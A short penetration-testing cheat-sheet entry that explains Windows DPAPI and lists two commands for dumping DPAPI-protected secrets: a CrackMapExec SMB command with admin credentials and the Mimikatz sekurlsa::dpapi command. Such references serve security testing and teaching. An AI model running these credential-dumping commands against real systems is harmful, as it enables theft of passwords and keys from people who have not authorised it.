Data Protection API (DPAPI)
DPAPI (Data Protection Application Programming Interface) is a Windows operating system feature that provides data protection by encrypting sensitive data using a user's login credentials. DPAPI is used by various applications to protect sensitive information such as passwords, keys, and credentials.
If an attacker gains access to a user's login credentials, they can use DPAPI to decrypt the protected data. Therefore, DPAPI is a valuable target for attackers looking to gain access to sensitive information.
# Dumping DPAPI with CrackMapExec
## Requires Local Administrator privileges
crackmapexec smb $ip -u $user -p $password --dpapi
# Dumping DPPAI with Mimikatz
sekurlsa::dpapi
References
Last updated